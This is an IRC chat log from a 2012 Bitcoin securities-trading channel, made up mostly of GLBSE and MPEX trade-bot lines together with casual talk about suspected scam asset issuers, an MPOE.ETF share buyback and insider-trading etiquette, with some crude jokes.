Oct 03 23:12:25 I always assuemd usagi could payout. I contacted him about insuring an asset and was told I could be covered for every bitcent I deposited into the insurance plan...thats not ins;) Oct 03 23:13:10 Ignatius-otc: its great that he told you stuff but seriously.. Oct 03 23:13:48 no, dub, I mean he only offered to cover what was paid in. real insurance does not work quite like that Oct 03 23:15:01 why did you assume in the first place that this random person with no reputation, that cant even decide on the sex of the internet personal it projects, would do anything it said it would Oct 03 23:15:25 large asset issuer, plenty of people who claim he is trustworthy Oct 03 23:15:29 well, at *that* time Oct 03 23:15:38 Ignatius-otc ikr ? Oct 03 23:16:30 I wanted to issue my own asset on glbse so I contacted several current issuers including usagi. I saw he ran CPA so I inquired about insuring my asset for shareholder benefit. Nothing ever came of it Oct 03 23:17:06 this is really the root of the problem Oct 03 23:17:24 At the time I even mentioned to him it would be beneficial if the insurer defaulted and my asset didnt, should have added some credibility;) Oct 03 23:17:25 scammer can simply creat a lot of 'companies' and people magically assign trust Oct 03 23:17:32 http://paste.pound-python.org/raw/24149/ looky what the trawlers dredged up Oct 03 23:17:44 theres not much magic to it dub Oct 03 23:17:53 you act as if the guy didnt hang around for months paying out divs normally Oct 03 23:18:56 which asset? Oct 03 23:20:20 was that directed at me dub? I havent owned his assets but nyans paid out fine? Oct 03 23:20:40 nyans have been around for months? Oct 03 23:21:13 so you are saying usagi does not have any assets which are odler than 3 months and have paid out divs consistently? Oct 03 23:21:42 [GLBSE] [GIGAMINING] 1 @ 0.54 BTC [+] Oct 03 23:22:29 I thought he did, a minign turd at the least? If not nevermind my apologies Oct 03 23:23:56 [GLBSE] [BITBOND] 1 @ 0.21 BTC [-] Oct 03 23:24:02 its cool that GLBSE doesnt list the date an asset was created Oct 03 23:24:38 [MPEX] [S.MPOE] 35811 @ 0.00036128 = 12.9378 BTC [+] Oct 03 23:24:39 [MPEX] [S.MPOE] 12073 @ 0.00036159 = 4.3655 BTC [+] Oct 03 23:24:53 dub wink wink Oct 03 23:25:51 [GLBSE] [GIGAMINING] 1 @ 0.54 BTC [+] Oct 03 23:25:53 [GLBSE] [GIGAMINING] 1 @ 0.5562 BTC [+] Oct 03 23:25:56 [GLBSE] [GIGAMINING] 2 @ 0.5598 = 1.1196 BTC [+] Oct 03 23:26:53 [GLBSE] [BITBOND] 1 @ 0.2 BTC [-] Oct 03 23:27:12 I give up, I spent some time searching the forums but fail to find an asset meeting my criteria, lawl Oct 03 23:28:16 are there any assets you can recommend dub? Oct 03 23:28:16 Ignatius-bot ;) Oct 03 23:29:45 none atm Oct 03 23:29:52 I'd GTFO GLBSE if you still can tbh Oct 03 23:30:20 I pulled out awhile ago:( I tried really hard to make it work there but couldnt do so. Oct 03 23:30:22 hard to have faith in assets issued on a scam exchange Oct 03 23:30:27 [GLBSE] [BITBOND] 1 @ 0.19 BTC [-] Oct 03 23:32:11 [GLBSE] [BITBOND] 1 @ 0.19000001 BTC [+] Oct 03 23:45:43 !ticker s.mpoe Oct 03 23:45:44 [MPEX:S.MPOE] 1day: 0.00035922 / 0.00036301 / 0.00037006 (1917311 shares, 696.02 BTC), 30day: 0.00034 / 0.00038901 / 0.00042 (64296880 shares, 25,012.49 BTC) Oct 03 23:49:48 [MPEX] [F.GIGA.ETF] 3900 @ 0.00045476 = 1.7736 BTC [-] Oct 03 23:50:13 [GLBSE] [PIMP] 1 @ 0.08999999 BTC [+] Oct 04 00:00:00 [GLBSE] [ASICMINER] 5 @ 0.1099 = 0.5495 BTC [-] Oct 04 00:02:04 [GLBSE] [BITBOND] 1 @ 0.21 BTC [+] Oct 04 00:07:13 [GLBSE] [MMM] 3 @ 0.59 = 1.77 BTC [+] Oct 04 00:09:43 [GLBSE] [YABMC] 3 @ 0.07065001 = 0.212 BTC [-] Oct 04 00:09:44 [GLBSE] [YABMC] 1 @ 0.07065 BTC [-] Oct 04 00:09:45 [Local Rules : Anyone can post in this thread, even people who are confused over their gender, can't do basic math, view failure as doing well and in general lack any idea of how to run a business] Oct 04 00:09:46 [GLBSE] [YABMC] 25 @ 0.0706 = 1.765 BTC [-] Oct 04 00:09:47 [GLBSE] [YABMC] 1 @ 0.06802 BTC [-] Oct 04 00:09:48 [GLBSE] [YABMC] 19 @ 0.068 = 1.292 BTC [-] Oct 04 00:09:49 [GLBSE] [YABMC] 1 @ 0.06412 BTC [-] Oct 04 00:09:50 [GLBSE] [YABMC] 2 @ 0.06404 = 0.1281 BTC [-] Oct 04 00:09:51 [GLBSE] [YABMC] 2 @ 0.06402 = 0.128 BTC [-] Oct 04 00:09:51 [GLBSE] [YABMC] 1 @ 0.06381 BTC [-] Oct 04 00:09:52 [GLBSE] [YABMC] 1 @ 0.06379 BTC [-] Oct 04 00:09:53 [GLBSE] [YABMC] 1 @ 0.06377 BTC [-] Oct 04 00:09:55 [GLBSE] [YABMC] 5 @ 0.06202 = 0.3101 BTC [-] Oct 04 00:09:56 [GLBSE] [YABMC] 2 @ 0.062003 = 0.124 BTC [-] Oct 04 00:09:57 [GLBSE] [YABMC] 23 @ 0.062 = 1.426 BTC [-] Oct 04 00:09:58 [GLBSE] [YABMC] 1 @ 0.06199999 BTC [-] Oct 04 00:09:59 [GLBSE] [YABMC] 4 @ 0.06132 = 0.2453 BTC [-] Oct 04 00:10:00 [GLBSE] [YABMC] 20 @ 0.0613 = 1.226 BTC [-] Oct 04 00:10:00 [GLBSE] [YABMC] 1 @ 0.061201 BTC [-] Oct 04 00:10:01 [GLBSE] [YABMC] 20 @ 0.06112 = 1.2224 BTC [-] Oct 04 00:10:03 [GLBSE] [YABMC] 67 @ 0.0611 = 4.0937 BTC [-] Oct 04 00:13:46 [GLBSE] [ASICMINER] 74 @ 0.1099 = 8.1326 BTC [-] Oct 04 00:15:29 [MPEX] [F.GIGA.ETF] 4100 @ 0.00045477 = 1.8646 BTC [+] Oct 04 00:17:14 [GLBSE] [BTCS] 100 @ 0.01 = 1 BTC [-] Oct 04 00:18:45 [GLBSE] [ASICMINER] 36 @ 0.11 = 3.96 BTC [+] Oct 04 00:18:52 ;;ticker Oct 04 00:18:53 Best bid: 12.9001, Best ask: 12.95, Bid-ask spread: 0.04990, Last trade: 12.95, 24 hour volume: 33803, 24 hour low: 12.661, 24 hour high: 12.989 Oct 04 00:19:30 [GLBSE] [BITBOND] 8 @ 0.21089997 = 1.6872 BTC [+] Oct 04 00:21:26 [MPEX] [O.BTCUSD.C100T] 1000 @ 0.3369956 = 336.9956 BTC [+] Oct 04 00:22:01 [MPEX] [O.BTCUSD.C090T] 700 @ 0.40587623 = 284.1134 BTC [+] Oct 04 00:22:07 [GLBSE] [JAH] 10 @ 0.11 = 1.1 BTC [+] Oct 04 00:22:14 [MPEX] [O.BTCUSD.C080T] 250 @ 0.48215323 = 120.5383 BTC [+] Oct 04 00:23:16 https://www.youtube.com/watch?v=i-g2iGskFPE Oct 04 00:23:50 [GLBSE] [JAH] 5 @ 0.10001 = 0.5001 BTC [-] Oct 04 00:25:50 [GLBSE] [JAH] 64 @ 0.100001 = 6.4001 BTC [-] Oct 04 00:27:33 gold is a horrible standard. Oct 04 00:32:57 Yes. Bitcoin could replace it, that's why I shared this Oct 04 00:33:53 you saw what happened to diamonds recently ? Oct 04 00:34:16 i mean gold. one day someone finds a three by four by five kilometer gold rock under a sea somewhere and that's that. Oct 04 00:38:31 http://www.sciencedaily.com/releases/2012/10/121002150031.htm Superman-Strength Bacteria Produce 24-Karat Gold Oct 04 00:47:30 [MPEX] [S.MPOE] 13700 @ 0.00036152 = 4.9528 BTC [-] Oct 04 00:47:32 [MPEX] [S.MPOE] 11722 @ 0.00036159 = 4.2386 BTC [+] Oct 04 00:50:01 short it on bit4x :p Oct 04 00:56:13 [GLBSE] [LOTTOMINING] 20 @ 0.25 = 5 BTC Oct 04 00:57:07 lol Oct 04 00:57:21 [GLBSE] [LOTTOMINING] 1 @ 0.25 BTC Oct 04 00:57:28 speaking of scams : https://bitcointalk.org/index.php?topic=115304.msg1243061 Oct 04 00:57:55 [GLBSE] [BITBOND] 1 @ 0.21089997 BTC [+] Oct 04 01:02:48 [GLBSE] [GSDPT] 5 @ 0.00339 = 0.017 BTC [+] Oct 04 01:04:13 [GLBSE] [GSDPT] 50 @ 0.00339 = 0.1695 BTC [+] Oct 04 01:09:26 [GLBSE] [GSDPT] 12 @ 0.00339 = 0.0407 BTC [+] Oct 04 01:11:47 [GLBSE] [YABMC] 2 @ 0.07699989 = 0.154 BTC [+] Oct 04 01:12:36 [MPEX] [S.MPOE] 18717 @ 0.00036048 = 6.7471 BTC [-] Oct 04 01:12:37 [MPEX] [S.MPOE] 14478 @ 0.00035922 = 5.2008 BTC [-] Oct 04 01:19:49 [MPEX] [S.BVPS] 1000 @ 0.0034007 = 3.4007 BTC [-] Oct 04 01:27:57 [MPEX] [S.BVPS] 7500 @ 0.0034007 = 25.5053 BTC [-] Oct 04 01:31:28 [GLBSE] [BITBOND] 2 @ 0.21089998 = 0.4218 BTC [+] Oct 04 01:31:29 [GLBSE] [BITBOND] 1 @ 0.21089999 BTC [+] Oct 04 01:31:31 [GLBSE] [BITBOND] 1 @ 0.2163 BTC [+] Oct 04 01:40:55 [GLBSE] [MERGEDMINING] 5 @ 0.05 = 0.25 BTC [-] Oct 04 01:41:10 [GLBSE] [BBBB] 1 @ 0.00016 BTC [+] Oct 04 01:44:19 [GLBSE] [BMMO] 5 @ 0.05 = 0.25 BTC [+] Oct 04 01:45:03 [GLBSE] [NASTY] 1 @ 0.4525006 BTC [-] Oct 04 01:45:04 [GLBSE] [NASTY] 8 @ 0.45250059 = 3.62 BTC [-] Oct 04 01:45:05 [GLBSE] [NASTY] 1 @ 0.45240059 BTC [-] Oct 04 01:45:26 [GLBSE] [GIGAMINING] 2 @ 0.56619996 = 1.1324 BTC [+] Oct 04 01:46:27 [GLBSE] [BITBOND] 5 @ 0.21089997 = 1.0545 BTC [-] Oct 04 01:46:50 [GLBSE] [NASTY] 4 @ 0.45250061 = 1.81 BTC [+] Oct 04 01:46:58 Milk is murder! Oct 04 01:47:38 [GLBSE] [007] 4 @ 0.081 = 0.324 BTC [-] Oct 04 01:47:40 [GLBSE] [007] 10 @ 0.0808 = 0.808 BTC [-] Oct 04 01:47:41 [GLBSE] [007] 7 @ 0.08051 = 0.5636 BTC [-] Oct 04 01:47:55 [GLBSE] [DMC] 1 @ 0.0748899 BTC [+] Oct 04 01:48:35 [GLBSE] [FPGA.CONTRACT] 1 @ 0.06945 BTC [+] Oct 04 01:48:36 [GLBSE] [FPGA.CONTRACT] 2 @ 0.0695 = 0.139 BTC [+] Oct 04 01:48:38 [GLBSE] [FPGA.CONTRACT] 2 @ 0.0699 = 0.1398 BTC [+] Oct 04 01:49:27 whats with this milk thingy Oct 04 01:49:52 lol dub Oct 04 01:49:56 kakobrekla it's a btcmeme. Oct 04 01:50:17 semms like im out of the loop Oct 04 01:50:25 seems Oct 04 01:50:30 ;;seen nefario Oct 04 01:50:30 nefario was last seen in #bitcoin-assets 1 week, 2 days, 2 hours, 50 minutes, and 37 seconds ago: Those assets are not listed or traded anymore Oct 04 01:50:34 :o Oct 04 01:50:51 the noob flashed in/out to reset the counter Oct 04 01:50:54 but forgot to say anything Oct 04 01:51:14 lol Oct 04 01:51:21 kakobrekla it's a funny usagi post where he says "milk is scammer" Oct 04 01:51:43 MILK IS SCAMMER?! Oct 04 01:51:49 BUT WHAT GOES GOOD WITH SANDVICH Oct 04 01:51:52 OM NOM NOM NOM NOM Oct 04 01:52:09 you are now reading everything I say in Heavy's voice. Oct 04 01:52:32 i dont even know who heavy is Oct 04 01:52:42 too bad, I imagine I broke a lot of people's brains Oct 04 01:53:01 you know most people with a degree don't verbalise what they read Oct 04 01:53:02 [MPEX] [F.GIGA.ETF] 2157 @ 0.00045477 = 0.9809 BTC [+] Oct 04 01:53:03 [MPEX] [F.GIGA.ETF] 472 @ 0.00045477 = 0.2147 BTC [+] Oct 04 01:53:18 mircea_popescu: its the meme effect Oct 04 01:53:24 same way if I go Oct 04 01:53:39 GOOD NEWS EVERYONE! I INVENTED A MACHINE THAT MAKES YOU READ THIS IN MY VOICE! Oct 04 01:53:57 I havn't heard your voice Oct 04 01:55:42 he's prolly all whiny and geek-sounding Oct 04 01:55:56 [GLBSE] [ASICMINER] 36 @ 0.1091 = 3.9276 BTC [-] Oct 04 01:55:58 [GLBSE] [ASICMINER] 64 @ 0.109 = 6.976 BTC [-] Oct 04 01:56:15 mircea_popescu: No, I pretty much sound like you'd think Satan would sound like. Oct 04 01:56:27 that's it then Oct 04 01:56:33 i always thought satan sounds like a girl Oct 04 01:56:42 Smoovious: oh thop it! Oct 04 01:57:34 nope, I'm more like a white samuel l jackson Oct 04 01:58:10 yes, milk. it is funny. Oct 04 01:58:50 kakobrekla :p Oct 04 01:58:59 i am not milk. Oct 04 01:59:19 Diablo-D3 make me a vid saying trilema is great then Oct 04 01:59:32 mircea_popescu: uh, no? Oct 04 01:59:40 dont have a camera anyhow Oct 04 01:59:42 then say trilema is bad Oct 04 01:59:54 you dont have a smartphone? Oct 04 02:00:01 well the phone he has... Oct 04 02:00:01 kakobrekla: no, dont have a cell phone at all Oct 04 02:00:20 http://i.imgur.com/bTGmi.png this is possibly the most retarded thing ever. Oct 04 02:00:46 no cell phone Oct 04 02:00:49 no camera Oct 04 02:00:51 no mic Oct 04 02:00:57 shut off lcd. Oct 04 02:01:19 mircea_popescu: ARGH BRAIN HURT Oct 04 02:01:44 i didn't know anyone could be this stupid Oct 04 02:01:57 "let's give people arbitrary numbers of currency they can spend, this way they are invested" Oct 04 02:02:02 holy fuck its in my brain killing my brain cells Oct 04 02:02:11 "unlike the evil bitcoin people, who aren't invested, even tho they work for it and can spend it" Oct 04 02:02:20 mircea_popescu: wait Oct 04 02:02:25 [07:01:59] "let's give people arbitrary numbers of currency they can spend, this way they are invested" Oct 04 02:02:32 isnt that basically the federal reserve way of banking? Oct 04 02:02:34 yes. Oct 04 02:02:44 solidcoin noob has made a fiat blockchain Oct 04 02:05:56 [GLBSE] [GSDPT] 67 @ 0.003205 = 0.2147 BTC [-] Oct 04 02:05:58 [GLBSE] [GSDPT] 50 @ 0.003201 = 0.1601 BTC [-] Oct 04 02:05:59 [GLBSE] [GSDPT] 343 @ 0.0032 = 1.0976 BTC [-] Oct 04 02:17:11 [GLBSE] [GOLD] 1 @ 0.00999 BTC [+] Oct 04 02:17:46 [GLBSE] [PLATINUM] 3 @ 0.00999998 = 0.03 BTC [+] Oct 04 02:18:18 [MPEX] [F.GIGA.ETF] 5540 @ 0.00045476 = 2.5194 BTC [-] Oct 04 02:23:47 [GLBSE] [SILVER] 20 @ 0.00999999 = 0.2 BTC [+] Oct 04 02:24:56 [GLBSE] [GOLD] 20 @ 0.00999999 = 0.2 BTC [+] Oct 04 02:25:30 [GLBSE] [CBGB] 6 @ 0.48 = 2.88 BTC [-] Oct 04 02:25:40 [GLBSE] [RAREEARTH] 20 @ 0.01 = 0.2 BTC [+] Oct 04 02:27:11 [GLBSE] [PLATINUM] 20 @ 0.00999999 = 0.2 BTC [+] Oct 04 02:27:19 https://bitcointalk.org/index.php?topic=67535.msg1243305#msg1243305 Oct 04 02:27:26 an important announcement Oct 04 02:27:31 re MPOE.ETF Oct 04 02:29:34 and i'd just like to point out that it ipo'd at .1 and will buy back all shares at 1.29ish. with dividends all along the way, I believe it was quite possibly the best thing on GLBSE Oct 04 02:29:53 o hey. Oct 04 02:30:02 yup Oct 04 02:30:08 too bad we didnt throw millions Oct 04 02:30:28 lol peopel didn't really invest a lot in the good stuff, did they. Oct 04 02:30:38 nope Oct 04 02:30:42 seems scams are most popular Oct 04 02:30:47 awell. Oct 04 02:30:58 So... I'll have to do all the passthroughs on GLBSE now? Oct 04 02:31:07 Seems all ops are closing down. Oct 04 02:31:08 BTC-Mining last in turns off the lights Oct 04 02:32:46 [GLBSE] [LOTTOMINING] 1 @ 0.25 BTC Oct 04 02:33:47 [GLBSE] [MPOE.ETF] 1 @ 0.99999999 BTC [+] Oct 04 02:33:49 [GLBSE] [MPOE.ETF] 2 @ 1 = 2 BTC [+] Oct 04 02:34:28 jees, not to mention the usd/btc rate went up ~150% during its operation Oct 04 02:35:12 now you're starting usagitalk. Oct 04 02:35:38 ;) Oct 04 02:35:53 i read that too :D Oct 04 02:37:22 [GLBSE] [MPOE.ETF] 1 @ 1 BTC [+] Oct 04 02:38:12 [GLBSE] [CPA] 1 @ 0.019 BTC [-] Oct 04 02:38:14 [GLBSE] [CPA] 5 @ 0.017 = 0.085 BTC [-] Oct 04 02:38:15 [GLBSE] [CPA] 9 @ 0.01502 = 0.1352 BTC [-] Oct 04 02:38:16 [GLBSE] [CPA] 9 @ 0.01404 = 0.1264 BTC [-] Oct 04 02:38:18 [GLBSE] [CPA] 36 @ 0.014 = 0.504 BTC [-] Oct 04 02:38:36 [GLBSE] [MPOE.ETF] 1 @ 1 BTC [+] Oct 04 02:38:59 [GLBSE] [MPOE.ETF] 1 @ 1 BTC [+] Oct 04 02:40:05 smickles, mircea_popescu: I think the problem is this Oct 04 02:40:07 bitcoin sucks. Oct 04 02:40:11 smickles so you actually have a 1k or w/e wall up ? Oct 04 02:40:19 like, biggest wall in history of glbse ? Oct 04 02:42:28 mircea_popescu: i'm about to request the withdrawal from mpex to glbse, so the wall will be up in due course ;) Oct 04 02:42:45 When do you buy back? Oct 04 02:43:14 i'll start as soon as the funds gets there Oct 04 02:43:29 so judging from mircea_popescu's last statement, never Oct 04 02:43:30 [MPEX] [S.MPOE] 33700 @ 0.00036132 = 12.1765 BTC [+] Oct 04 02:43:31 [MPEX] [S.MPOE] 32300 @ 0.00036159 = 11.6794 BTC [+] Oct 04 02:43:33 mircea_popescu: thats not even funny dude Oct 04 02:43:46 :D Oct 04 02:43:53 :D Oct 04 02:44:11 smickles : 1284; 3488; 9501; 449x Oct 04 02:44:15 6674 Oct 04 02:44:19 19 Oct 04 02:44:35 this concludes our legal obligations together. Oct 04 02:45:02 [GLBSE] [MPOE.ETF] 21 @ 1 = 21 BTC [+] Oct 04 02:45:04 [GLBSE] [MPOE.ETF] 3 @ 1.2 = 3.6 BTC [+] Oct 04 02:45:19 lol ppl locking in a quick 20% Oct 04 02:45:51 damn, if i had no ethics, those woul've been mine Oct 04 02:45:59 seemed like a smart move, too bad about that code only thing;) Oct 04 02:46:04 :D Oct 04 02:47:01 anyway, glbse gave me a badass deposit addy Oct 04 02:47:14 1Birt5ACuc72jCa4FmwSazyn6jBhvrEHvR Oct 04 02:47:22 i read it as 1 birt ever Oct 04 02:48:49 or birtsac Oct 04 02:48:53 smickles : stop libeling my exchange or else you will be banned! Oct 04 02:49:12 also, local thread rules. Oct 04 02:49:15 is slander ok? Oct 04 02:49:22 lol Oct 04 02:49:24 .wik slander Oct 04 02:49:26 "Defamation—also called calumny, vilification, traducement, slander (for transitory statements), and libel (for written, broadcast, or otherwise published words)—is the communication of a statement that makes a claim, expressly stated or implied to be factual, that [...]" - http://en.wikipedia.org/wiki/Slander Oct 04 02:49:33 no dude its not ok wtf Oct 04 02:49:37 o also Oct 04 02:49:38 i think now Oct 04 02:49:40 i have to Oct 04 02:49:41 talk like Oct 04 02:49:43 nefario Oct 04 02:49:53 I don't have much ethics I guess then. I buy my own issue when I see orders too low. Oct 04 02:50:20 BTC-Mining: it's only bad if you do it with non-public knowledge in mind Oct 04 02:50:30 I avoid that. Oct 04 02:50:53 Although... I operated a fixed interest loan, and BTC-MINING for which nothing ever happens. Oct 04 02:50:53 so buying below a known book value is a-ok Oct 04 02:51:27 smickles your book values were pretty well established Oct 04 02:51:30 Wait, was the 1.29ish purchase announced on the forum already? Oct 04 02:51:55 yup Oct 04 02:52:13 but it's proper to wait a significant amount of time Oct 04 02:52:29 Great. Unfortunatly you'd probably have to wait a bit to buy. Not instantly. Oct 04 02:52:39 Or that's still unfair Oct 04 02:52:41 and i've secretly known about it since the 1st Oct 04 02:52:41 Aye Oct 04 02:53:10 why's it unfair ? Oct 04 02:53:20 there's no bids lol, the spread is .3 2.0 Oct 04 02:53:26 !ticker mpoe.etf Oct 04 02:53:34 [GLBSE:MPOE.ETF] [Bid: 0.50000001] [Ask: 1.26383449] [Spread: 0.76383448] [Last: 1.2] [24hVol: 30.59999999] [7dAvg: 1.02857142] Oct 04 02:53:41 o lol nm Oct 04 02:53:46 Because if you announce something then buy 5 seconds afterward, nobody saw the news Oct 04 02:53:57 i could've had bids in based of of the previous month's financials Oct 04 02:54:53 BTC-Mining still, there was a gap the size of alaska. Oct 04 02:54:58 and he'd have bid in the gap Oct 04 02:55:34 48 1.26383449 Oct 04 02:55:34 64 2.0 Oct 04 02:55:35 vs Oct 04 02:55:42 2 0.50000001 Oct 04 02:55:42 180 0.5 Oct 04 02:55:42 1 0.31 Oct 04 02:55:42 17 0.3 Oct 04 02:55:43 etc Oct 04 02:57:14 well, in my defense, i was otherwise occupied Oct 04 03:00:42 oh, mircea_popescu it's not going to be a 1k wall because there's about 650 shares of treasure stock atm Oct 04 03:05:40 [GLBSE] [BITBOND] 1 @ 0.2 BTC [-] Oct 04 03:06:32 [GLBSE] [FZB.A] 5 @ 0.02 = 0.1 BTC [+] Oct 04 03:06:46 .py 650 *1.26 Oct 04 03:06:50 819.0 Oct 04 03:06:53 so 820 k Oct 04 03:08:35 [MPEX] [S.MPOE] 5300 @ 0.00036051 = 1.9107 BTC [-] Oct 04 03:09:52 neat http://pastebin.com/PfXUm3VQ Oct 04 03:10:43 hahaah Oct 04 03:12:41 very nice dub Oct 04 03:13:28 mircea_popescu: you got it a bit backwards Oct 04 03:14:08 650ish shares of _treasury_ stock (the stuff that doesn't get bought back b/c it's already in company hands) Oct 04 03:16:02 ooo Oct 04 03:16:10 so whats float, 500ish ? Oct 04 03:16:45 mircea_popescu: 452 Oct 04 03:17:37 a ok so like 500 Oct 04 03:18:18 !ticker COGNITIVE Oct 04 03:18:18 571.25319803 Oct 04 03:18:28 "Usagi should be viewed as a case study regarding what happens when a person with nearly zero knowledge of finance and business tries to manage a venture" Oct 04 03:18:29 [GLBSE:COGNITIVE] [Bid: 0.5751] [Ask: 0.57915996] [Spread: 0.00405996] [Last: 0.57979] [24hVol: 20.02079491] [7dAvg: 0.4837692] Oct 04 03:18:31 yup. Oct 04 03:19:24 damn i fail Oct 04 03:19:54 kakobrekla: how is your forex thing going? did you launch yet? Oct 04 03:20:13 yea, its lauched. Oct 04 03:20:27 people seem to think im milk! Oct 04 03:21:06 well, when I read what you planned to do, it was a little confusing Oct 04 03:21:06 as for self fail i was thinking about this Oct 04 03:21:07 https://bitcointalk.org/index.php?topic=102176.msg1243398#msg1243398 Oct 04 03:21:09 [GLBSE] [OBSI.HRPT] 10 @ 0.0099879 = 0.0999 BTC [-] Oct 04 03:21:10 [GLBSE] [OBSI.HRPT] 6 @ 0.009988 = 0.0599 BTC [+] Oct 04 03:21:11 [GLBSE] [OBSI.HRPT] 30 @ 0.00999 = 0.2997 BTC [+] Oct 04 03:21:12 [GLBSE] [OBSI.HRPT] 100 @ 0.01 = 1 BTC [+] Oct 04 03:21:52 damn kako, way 2 fail Oct 04 03:21:56 ya Oct 04 03:22:51 smickles well is it clear now or still confusing? Oct 04 03:23:03 milk! Oct 04 03:25:20 kakobrekla: i think i get it, but I wouldn't say I'm confident in my understanding. Oct 04 03:25:45 smickles https://bitcointalk.org/index.php?topic=115304.0 Oct 04 03:25:57 for one thing, i've never traded traditional forex before, so that's one degree of separation ;) Oct 04 03:26:38 Milk killed MJ! Oct 04 03:26:38 https://bitcointalk.org/index.php?topic=74975.msg1243259#msg1243259 o,o pitchfork team assembling at ludwig's gate. Oct 04 03:30:02 GIPPT was a hilariously bad name for an asset Oct 04 03:30:19 Invest and get GYPPED Oct 04 03:31:41 no mony for y Oct 04 03:31:48 come back, 1 year! Oct 04 03:32:07 chinese antique dealer stole Oct 04 03:32:23 but I talk to him and he pay back Oct 04 03:33:57 [MPEX] [S.MPOE] 6905 @ 0.00036159 = 2.4968 BTC [+] Oct 04 03:33:58 [MPEX] [S.MPOE] 16961 @ 0.00036238 = 6.1463 BTC [+] Oct 04 03:38:03 !pl mpoe.etf .1 Oct 04 03:38:03 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 04 03:38:14 MPOE.ETF [1@0.1BTC] paid: 0.02470282 BTC. Last price: 1.2 BTC. Capital gain: 1.1 BTC. Total: 1.12470282 BTC. (1124.7%) Oct 04 03:38:23 dun dun dun Oct 04 03:38:36 it'll go up a little too Oct 04 03:39:01 ;;bc,balance Oct 04 03:39:02 Error: "bc,balance" is not a valid command. Oct 04 03:39:29 ;;bc,imbalance Oct 04 03:39:29 Error: "bc,imbalance" is not a valid command. Oct 04 03:39:33 pff Oct 04 03:40:14 .py 1.26383449/1.2638345 Oct 04 03:40:17 0.999999992088 Oct 04 03:40:51 apparantly, my word is worth .999999992088 bitcents on the coin Oct 04 03:42:03 i wonder why someone would sell at a satoshi less than the buyback price Oct 04 03:42:42 because a satoshi is worth the delay time? Oct 04 03:43:35 i suppose that's the answer Oct 04 03:44:00 so what's the average amount of confirms to get funds to show in glbse? Oct 04 03:46:23 smickles prolly for the rebate. Oct 04 03:46:30 ;;seen Nefario Oct 04 03:46:30 Nefario was last seen in #bitcoin-assets 1 week, 2 days, 4 hours, 46 minutes, and 37 seconds ago: Those assets are not listed or traded anymore Oct 04 03:46:30 they provide liquidity now Oct 04 03:46:31 ;;bc,tblb Oct 04 03:46:33 Error: There's really no reason why you should have underscores or brackets in your mathematical expression. Please remove them. Oct 04 03:46:40 lolwut? Oct 04 03:46:48 you're selling inrto them, you pay fee. Oct 04 03:47:22 ah, fees, i forgot about those Oct 04 03:48:05 Well you said 1.29ish, not 1.29, so... Oct 04 03:48:22 or am I not following at all? Oct 04 03:48:24 thought he said 1.26 Oct 04 03:48:28 [GLBSE] [ASICMINER] 36 @ 0.1091 = 3.9276 BTC [+] Oct 04 03:48:30 [GLBSE] [ASICMINER] 64 @ 0.109 = 6.976 BTC [-] Oct 04 03:48:41 Yeah, I'm not really following Oct 04 03:48:59 either way, MPEx fees are damn low Oct 04 03:49:05 20 btc. Oct 04 03:49:23 I meant trading fees Oct 04 03:49:30 BTC-Mining: i specified 1.2638345 in the forum post Oct 04 03:49:46 Explains why there's offers at the price Oct 04 03:49:49 ;;bc,tslb Oct 04 03:49:49 and someone is asking for literally 1 satoshi less Oct 04 03:49:50 Time since last block: 13 minutes and 37 seconds Oct 04 03:49:55 hahahah Oct 04 03:50:08 lol Oct 04 03:50:17 dub wins the timing award Oct 04 03:50:19 lol u dub it ? Oct 04 03:50:35 dub'd Oct 04 03:51:14 1 satoshi is always a good price to pay to remove delays Oct 04 03:51:54 you won't be saying that once btc = 11million Oct 04 03:52:45 [GLBSE] [BBBB] 28 @ 0.00016 = 0.0045 BTC [+] Oct 04 03:53:19 I'll be like 'remember when I bought DMC stock for 1 satoshi!' Oct 04 03:53:28 lol Oct 04 03:53:44 of course DMC will by the AAPL of 12834AD Oct 04 03:55:30 Holy crap! Almost forgot... Oct 04 03:55:31 [GLBSE] [BITBOND] 1 @ 0.19 BTC [-] Oct 04 03:55:32 [GLBSE] [BITBOND] 5 @ 0.19 = 0.95 BTC [-] Oct 04 03:55:35 anno domini or after diablo? Oct 04 03:55:53 After Diablo of course Oct 04 03:56:15 There's the wednesday freeroll on Sealswithclub. Almost forgot it. Oct 04 03:57:01 ~100 people competing for 5 BTC =P Oct 04 03:57:06 lol Oct 04 03:57:10 not much but still fun Oct 04 03:57:12 last time he actually paid me like 2 Oct 04 03:57:22 or .2 ? Oct 04 03:57:30 ? Oct 04 03:57:30 [GLBSE] [ARS] 10 @ 0.0145 = 0.145 BTC [-] Oct 04 03:57:34 http://www.thepreciousmetal.com/images/Silver_Mexican_Libertad_Coins.jpg i really like her tits. Oct 04 03:57:39 Oh the bet? Oct 04 03:58:04 It was 0.02 if I lose, and you give me 2 if I won first place. Oct 04 03:58:09 I think Oct 04 03:58:16 1:100 ration Oct 04 03:58:19 ratio* Oct 04 03:59:29 [MPEX] [F.GIGA.ETF] 6400 @ 0.00045474 = 2.9103 BTC [-] Oct 04 03:59:30 [MPEX] [S.MPOE] 26563 @ 0.00036051 = 9.5762 BTC [-] Oct 04 03:59:31 aha yea Oct 04 03:59:54 Fun times wasting a bit of bitcoins. Oct 04 04:00:12 :p Oct 04 04:00:33 When they are 11 million as you say, remember when I paid you 220 000 USD Oct 04 04:00:38 :D Oct 04 04:03:13 rule 34 on michelle and ann tbh Oct 04 04:03:32 [GLBSE] [MPOE.ETF] 48 @ 1.26383449 = 60.6641 BTC [+] Oct 04 04:03:34 [GLBSE] [MPOE.ETF] 192 @ 1.2638345 = 242.6562 BTC [+] Oct 04 04:04:00 who're they ? Oct 04 04:04:00 11 million dollars x 21 million BTC = 231 trillion dollars Oct 04 04:04:11 BTC-Mining not very much but a start. Oct 04 04:04:15 obama and romneys wife Oct 04 04:04:18 o those ? Oct 04 04:04:26 i'd rather see the daughters go at it tbh Oct 04 04:04:36 Lol, it's actually a lot worldwide. Oct 04 04:05:11 Who bought MPOE? Oct 04 04:05:26 at the price smickles is going to buy them back? Oct 04 04:06:14 Somebody in deep need of a satoshi of profit? Oct 04 04:06:26 lol Oct 04 04:07:15 Probably somebody who saw people buying, and bet on a rally? Oct 04 04:07:25 Someone bought ? Oct 04 04:07:39 And who obviously doesn't know about the buyback... Oct 04 04:09:50 "I will place a bid to fulfill this end as soon as I have moved funds into the account on GLBSE." Oct 04 04:12:55 [GLBSE] [MPOE.ETF] 1 @ 1.25039734 BTC [-] Oct 04 04:12:57 [GLBSE] [MPOE.ETF] 69 @ 1.25039733 = 86.2774 BTC [-] Oct 04 04:13:37 smickles: So you're not buying back 